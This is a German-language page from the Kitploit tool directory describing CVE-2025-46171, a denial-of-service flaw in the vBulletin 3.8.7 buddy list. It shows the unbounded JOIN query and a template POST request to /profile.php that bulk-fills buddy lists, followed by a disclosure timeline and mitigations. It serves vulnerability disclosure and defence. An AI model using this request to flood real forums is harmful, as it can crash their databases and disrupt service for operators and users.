Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-46171 — Dokumentation einer Denial-of-Service-Schwachstelle in der vBulletin 3.8.7 Freundesliste. | Kitploit
Tools/GitHubGitHub/oiyl/cve-2025-46171
SchwachstellenanalyseWebanwendungs-ExploitationPenetrationstestsFehlkonfigurationDatenbanksicherheitArchived
GitHuboiyl/cve-2025-46171

CVE-2025-46171

Dokumentation einer Denial-of-Service-Schwachstelle in der vBulletin 3.8.7 Freundesliste.

Repository anzeigen
4vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

vBulletin 3.x.x - DoS durch Buddy-Listen-Überlastung

Zusammenfassung

Der Endpunkt /misc.php?do=buddylist führt eine einzelne, große JOIN-Abfrage aus, die alle Buddys zusammen mit deren Benutzer- und Sitzungsinformationen abruft, um den Online-Status zu prüfen. Da diese Abfrage die gesamte Buddy-Liste ohne Paginierung oder Ergebnisbegrenzung verarbeitet, wird sie extrem ressourcenintensiv und kann die Datenbank überlasten, wenn die Liste groß wird.

Dieses Problem ist leicht auszunutzen und erfordert nur minimalen Aufwand. Es sind keine besonderen Berechtigungen erforderlich, lediglich ein einfaches Benutzerkonto. Es reicht aus, die Buddy-Liste aufzublähen, um die Datenbank ernsthaft zu belasten.

Betroffene Versionen

  • ✅ Bestätigt verwundbar: vBulletin 3.8.7

Technische Details

Diese SQL-Abfrage ruft Buddy-Details zusammen mit Sitzungsinformationen ab, um den Online-Status für jeden Buddy zu prüfen. Da sie die gesamte Buddy-Liste verarbeitet und für jeden Eintrag mit Sitzungsdaten verknüpft, wird die Abfrage sehr groß und ressourcenintensiv.

root@kitploit:~
$buddys = $db->query_read_slave("
    SELECT
        user.username,
        (user.options & " . $vbulletin->bf_misc_useroptions['invisible'] . ") AS invisible,
        user.userid,
        session.lastactivity
    FROM " . TABLE_PREFIX . "userlist AS userlist
    LEFT JOIN " . TABLE_PREFIX . "user AS user ON (user.userid = userlist.relationid)
    LEFT JOIN " . TABLE_PREFIX . "session AS session ON (session.userid = user.userid)
    WHERE userlist.userid = {$vbulletin->userinfo['userid']}
        AND userlist.relationid = user.userid
        AND type = 'buddy'
    ORDER BY username ASC, session.lastactivity DESC
");

Zeitplan

  • 17. April 2025: Sicherheitslücke entdeckt
  • 18. April 2025: CVE-Antrag bei MITRE eingereicht
  • 29. Mai 2025: CVE-2025-46171 zugewiesen
  • 27. Juni 2025: Öffentliche Offenlegung

Ausnutzung

Massenhaftes Hinzufügen von Freunden

Freundeslisten können durch POST-Anfragen an /profile.php mit listbits befüllt werden. Dies kann für Tausende von Benutzer-IDs wiederholt werden, um die Buddy-Liste aufzublähen:

root@kitploit:~
POST /profile.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

securitytoken=TOKEN
&ajax=1
&do=updatelist
&userlist=buddy
&listbits[buddy_original][USER_ID]=USER_ID
&listbits[buddy][USER_ID]=USER_ID
&listbits[friend][USER_ID]=USER_ID
&listbits[friend_original][USER_ID]=USER_ID
...

Auswirkungen

In großen Foren kann dies zu erheblichen Abfrageverzögerungen führen oder die MySQL-Instanz zum Absturz bringen.

Abhilfemaßnahmen:

  • Abfrage-Paginierung anwenden oder die Anzahl der abgerufenen Buddy-Einträge pro Anfrage begrenzen
  • Ratenbegrenzung und Validierung bei Änderungen der Buddy-Liste anwenden
Tool herunterladen